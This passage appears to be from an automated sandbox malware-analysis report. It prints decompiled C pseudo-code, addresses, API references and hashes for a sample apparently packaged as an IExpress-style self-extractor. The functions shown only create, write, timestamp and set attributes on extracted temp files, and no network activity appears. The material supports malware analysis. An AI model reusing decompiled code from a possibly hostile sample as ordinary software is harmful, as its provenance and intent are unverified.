                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c3ada135dd6083089893b25a85918a53d67e61dd767d76e306f6b826aff6787
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E04F30550718FBDF238B90EC0AF6E7B2DF742740F110296F904A0260EB625A14E645
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00394CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				long _t44;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				long _t46;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				long _t51;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                    				CHAR* _t74;
                                                                                                                                                                                                    				int _t75;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                    				_v8 = _t30;
                                                                                                                                                                                                    				_t75 = _a8;
                                                                                                                                                                                                    				if( *0x3991d8 == 0) {
                                                                                                                                                                                                    					_t32 = _a4;
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                    						_t33 = E00394E99(_t75);
                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                    						return E00396CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t35 = _t32 - 1;
                                                                                                                                                                                                    					__eflags = _t35;
                                                                                                                                                                                                    					if(_t35 == 0) {
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t36 = _t35 - 1;
                                                                                                                                                                                                    					__eflags = _t36;
                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                    						_t37 =  *0x398584; // 0x0
                                                                                                                                                                                                    						__eflags = _t37;
                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                    							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t54 = 0x3991e4;
                                                                                                                                                                                                    						_t58 = 0x3991e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t38 =  *_t58;
                                                                                                                                                                                                    							_t58 =  &(_t58[1]);
                                                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                                                    						} while (_t38 != 0);
                                                                                                                                                                                                    						_t59 = _t58 - 0x3991e5;
                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                    						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t73 =  &(_t71[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t39 =  *_t71;
                                                                                                                                                                                                    							_t71 =  &(_t71[1]);
                                                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                                                    						} while (_t39 != 0);
                                                                                                                                                                                                    						_t69 = _t71 - _t73;
                                                                                                                                                                                                    						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                    							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x3991e4;
                                                                                                                                                                                                    						_t30 = E00394702( &_v268, 0x3991e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t41 = E0039476D( &_v268, __eflags);
                                                                                                                                                                                                    						__eflags = _t41;
                                                                                                                                                                                                    						if(_t41 == 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0x180);
                                                                                                                                                                                                    						_t30 = E00394980( &_v268, 0x8302); // executed
                                                                                                                                                                                                    						_t75 = _t30;
                                                                                                                                                                                                    						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                    						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E003947E0( &_v268);
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x3993f4 =  *0x3993f4 + 1;
                                                                                                                                                                                                    						_t33 = _t75;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t44 = _t36 - 1;
                                                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                    						_t54 = 0x3991e4;
                                                                                                                                                                                                    						_t63 = 0x3991e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t64 = _t63 - 0x3991e5;
                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x3991e4;
                                                                                                                                                                                                    						_t30 = E00394702( &_v268, 0x3991e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                    						_t30 = E00394C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E00394B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t33 = 1;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                    					_t30 = E00394B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                    			}































                                                                                                                                                                                                    0x00394cd0
                                                                                                                                                                                                    0x00394cdb
                                                                                                                                                                                                    0x00394ce0
                                                                                                                                                                                                    0x00394ce2
                                                                                                                                                                                                    0x00394cee
                                                                                                                                                                                                    0x00394cf2
                                                                                                                                                                                                    0x00394d0e
                                                                                                                                                                                                    0x00394d0e
                                                                                                                                                                                                    0x00394d11
                                                                                                                                                                                                    0x00394e83
                                                                                                                                                                                                    0x00394e88
                                                                                                                                                                                                    0x00394e98
                                                                                                                                                                                                    0x00394e98
                                                                                                                                                                                                    0x00394d17
                                                                                                                                                                                                    0x00394d17
                                                                                                                                                                                                    0x00394d1a
                                                                                                                                                                                                    0x00394d2f
                                                                                                                                                                                                    0x00394d2f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d2f
                                                                                                                                                                                                    0x00394d1c
                                                                                                                                                                                                    0x00394d1c
                                                                                                                                                                                                    0x00394d1f
                                                                                                                                                                                                    0x00394dcb
                                                                                                                                                                                                    0x00394dd0
                                                                                                                                                                                                    0x00394dd2
                                                                                                                                                                                                    0x00394ddd
                                                                                                                                                                                                    0x00394ddd
                                                                                                                                                                                                    0x00394de3
                                                                                                                                                                                                    0x00394de8
                                                                                                                                                                                                    0x00394ded
                                                                                                                                                                                                    0x00394ded
                                                                                                                                                                                                    0x00394def
                                                                                                                                                                                                    0x00394df0
                                                                                                                                                                                                    0x00394df0
                                                                                                                                                                                                    0x00394df4
                                                                                                                                                                                                    0x00394df4
                                                                                                                                                                                                    0x00394df6
                                                                                                                                                                                                    0x00394df9
                                                                                                                                                                                                    0x00394dfc
                                                                                                                                                                                                    0x00394dfc
                                                                                                                                                                                                    0x00394dfe
                                                                                                                                                                                                    0x00394dff
                                                                                                                                                                                                    0x00394dff
                                                                                                                                                                                                    0x00394e03
                                                                                                                                                                                                    0x00394e08
                                                                                                                                                                                                    0x00394e0a
                                                                                                                                                                                                    0x00394e0f
                                                                                                                                                                                                    0x00394d03
                                                                                                                                                                                                    0x00394d03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d03
                                                                                                                                                                                                    0x00394e18
                                                                                                                                                                                                    0x00394e20
                                                                                                                                                                                                    0x00394e25
                                                                                                                                                                                                    0x00394e27
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394e33
                                                                                                                                                                                                    0x00394e38
                                                                                                                                                                                                    0x00394e3a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394e40
                                                                                                                                                                                                    0x00394e51
                                                                                                                                                                                                    0x00394e56
                                                                                                                                                                                                    0x00394e5b
                                                                                                                                                                                                    0x00394e5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394e6a
                                                                                                                                                                                                    0x00394e6f
                                                                                                                                                                                                    0x00394e71
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394e77
                                                                                                                                                                                                    0x00394e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394e7d
                                                                                                                                                                                                    0x00394d25
                                                                                                                                                                                                    0x00394d25
                                                                                                                                                                                                    0x00394d28
                                                                                                                                                                                                    0x00394d36
                                                                                                                                                                                                    0x00394d3b
                                                                                                                                                                                                    0x00394d40
                                                                                                                                                                                                    0x00394d40
                                                                                                                                                                                                    0x00394d42
                                                                                                                                                                                                    0x00394d43
                                                                                                                                                                                                    0x00394d43
                                                                                                                                                                                                    0x00394d47
                                                                                                                                                                                                    0x00394d4a
                                                                                                                                                                                                    0x00394d4a
                                                                                                                                                                                                    0x00394d4c
                                                                                                                                                                                                    0x00394d4f
                                                                                                                                                                                                    0x00394d4f
                                                                                                                                                                                                    0x00394d51
                                                                                                                                                                                                    0x00394d52
                                                                                                                                                                                                    0x00394d52
                                                                                                                                                                                                    0x00394d56
                                                                                                                                                                                                    0x00394d5b
                                                                                                                                                                                                    0x00394d5d
                                                                                                                                                                                                    0x00394d62
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d67
                                                                                                                                                                                                    0x00394d6f
                                                                                                                                                                                                    0x00394d74
                                                                                                                                                                                                    0x00394d76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d7c
                                                                                                                                                                                                    0x00394d84
                                                                                                                                                                                                    0x00394d89
                                                                                                                                                                                                    0x00394d8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d94
                                                                                                                                                                                                    0x00394d99
                                                                                                                                                                                                    0x00394d9e
                                                                                                                                                                                                    0x00394da1
                                                                                                                                                                                                    0x00394daa
                                                                                                                                                                                                    0x00394daa
                                                                                                                                                                                                    0x00394da3
                                                                                                                                                                                                    0x00394da3
                                                                                                                                                                                                    0x00394da3
                                                                                                                                                                                                    0x00394db5
                                                                                                                                                                                                    0x00394dbb
                                                                                                                                                                                                    0x00394dbd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394dc3
                                                                                                                                                                                                    0x00394dc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394dc5
                                                                                                                                                                                                    0x00394dbd
                                                                                                                                                                                                    0x00394d2a
                                                                                                                                                                                                    0x00394d2a
                                                                                                                                                                                                    0x00394d2d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d2d
                                                                                                                                                                                                    0x00394cf8
                                                                                                                                                                                                    0x00394cfd
                                                                                                                                                                                                    0x00394d02
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00394DB5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00394DDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    • API String ID: 3625706803-1116576409
                                                                                                                                                                                                    • Opcode ID: ec99f5b92e9854cb4b17e0212a0d78e379dbdac4dac518ef09517d054ae71d7d
                                                                                                                                                                                                    • Instruction ID: 1a2c7645ae92beb74090120e79ade4a5c13e13b7c3b457db5fed4ba6a98e7cbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec99f5b92e9854cb4b17e0212a0d78e379dbdac4dac518ef09517d054ae71d7d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D41453A6001059BCF239F38DC44EB673A9FF45304F054669E882AB686DB32DE4BC790
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00394C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                    				struct _FILETIME _v20;
                                                                                                                                                                                                    				FILETIME* _t14;
                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t21 = __ecx * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t21 + 0x398d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t14 =  &_v12;
                                                                                                                                                                                                    					_t15 = SetFileTime( *(_t21 + 0x398d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00394c40
                                                                                                                                                                                                    0x00394c4a
                                                                                                                                                                                                    0x00394c8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394c70
                                                                                                                                                                                                    0x00394c70
                                                                                                                                                                                                    0x00394c7e
                                                                                                                                                                                                    0x00394c86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394c8a

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00394C54
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00394C66
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00394C7E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                    • Opcode ID: 567e55d77377d7fdbe06a31576ca66773df2c34475c0f86706196eae9d4d689e
                                                                                                                                                                                                    • Instruction ID: dbf9b771125f623cdb55828268508035a1e2ef7a1a335f50695e52881686c5f5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 567e55d77377d7fdbe06a31576ca66773df2c34475c0f86706196eae9d4d689e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0B47261120CBF9F26EFB5CC49DBB77ECEB44340B44062BB815C1150EA31D915DBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E0039487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				CHAR* _t11;
                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                    				long _t23;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t11 = __ecx;
                                                                                                                                                                                                    				asm("sbb edi, edi");
                                                                                                                                                                                                    				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                    				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                    					asm("sbb esi, esi");
                                                                                                                                                                                                    					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                                                                                    						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                    				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                    					return _t7;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E0039490C(_t11);
                                                                                                                                                                                                    					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00394880
                                                                                                                                                                                                    0x0039488c
                                                                                                                                                                                                    0x00394894
                                                                                                                                                                                                    0x003948a0
                                                                                                                                                                                                    0x003948c9
                                                                                                                                                                                                    0x003948ce
                                                                                                                                                                                                    0x003948a2
                                                                                                                                                                                                    0x003948a8
                                                                                                                                                                                                    0x003948b7
                                                                                                                                                                                                    0x003948bc
                                                                                                                                                                                                    0x003948aa
                                                                                                                                                                                                    0x003948ac
                                                                                                                                                                                                    0x003948ac
                                                                                                                                                                                                    0x003948a8
                                                                                                                                                                                                    0x003948de
                                                                                                                                                                                                    0x003948e7
                                                                                                                                                                                                    0x0039490b
                                                                                                                                                                                                    0x003948ee
                                                                                                                                                                                                    0x003948f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394902

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00394A23,?,00394F67,*MEMCAB,00008000,00000180), ref: 003948DE
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00394F67,*MEMCAB,00008000,00000180), ref: 00394902
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 61f8fab8908e6f643dc3b6e20b95978565c7c2da29f9ee3f89c4c88bc7547773
                                                                                                                                                                                                    • Instruction ID: 1073c6855fc54641ed0c647384fe75f02a3ad8f897c88f74ef516fc25ae2c409
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61f8fab8908e6f643dc3b6e20b95978565c7c2da29f9ee3f89c4c88bc7547773
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 550169A3E169702AF72640298C88FB7551CCBD6735F1B0335FDEAEB6D2D6654C0682E0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00394AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				int _t12;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				struct HWND__* _t21;
                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 =  *0x39858c; // 0x270
                                                                                                                                                                                                    				_t9 = E00393680(_t20);
                                                                                                                                                                                                    				if( *0x3991d8 == 0) {
                                                                                                                                                                                                    					_push(_t24);
                                                                                                                                                                                                    					_t12 = WriteFile( *(0x398d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t25 = _a12;
                                                                                                                                                                                                    						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    							_t14 =  *0x399400; // 0xf1e00
                                                                                                                                                                                                    							_t15 = _t14 + _t25;
                                                                                                                                                                                                    							 *0x399400 = _t15;
                                                                                                                                                                                                    							if( *0x398184 != 0) {
                                                                                                                                                                                                    								_t21 =  *0x398584; // 0x0
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3993f8, 0);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return _t9 | 0xffffffff;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00394ad5
                                                                                                                                                                                                    0x00394adb
                                                                                                                                                                                                    0x00394ae7
                                                                                                                                                                                                    0x00394aee
                                                                                                                                                                                                    0x00394b05
                                                                                                                                                                                                    0x00394b0d
                                                                                                                                                                                                    0x00394b14
                                                                                                                                                                                                    0x00394b1a
                                                                                                                                                                                                    0x00394b1c
                                                                                                                                                                                                    0x00394b21
                                                                                                                                                                                                    0x00394b2a
                                                                                                                                                                                                    0x00394b2f
                                                                                                                                                                                                    0x00394b31
                                                                                                                                                                                                    0x00394b39
                                                                                                                                                                                                    0x00394b54
                                                                                                                                                                                                    0x00394b54
                                                                                                                                                                                                    0x00394b39
                                                                                                                                                                                                    0x00394b2f
                                                                                                                                                                                                    0x00394b0f
                                                                                                                                                                                                    0x00394b0f
                                                                                                                                                                                                    0x00394b0f
                                                                                                                                                                                                    0x00394b5e
                                                                                                                                                                                                    0x00394ae9
                                                                                                                                                                                                    0x00394aed
                                                                                                                                                                                                    0x00394aed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00393680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0039369F
                                                                                                                                                                                                      • Part of subcall function 00393680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936B2
                                                                                                                                                                                                      • Part of subcall function 00393680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936DA
                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00394B05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
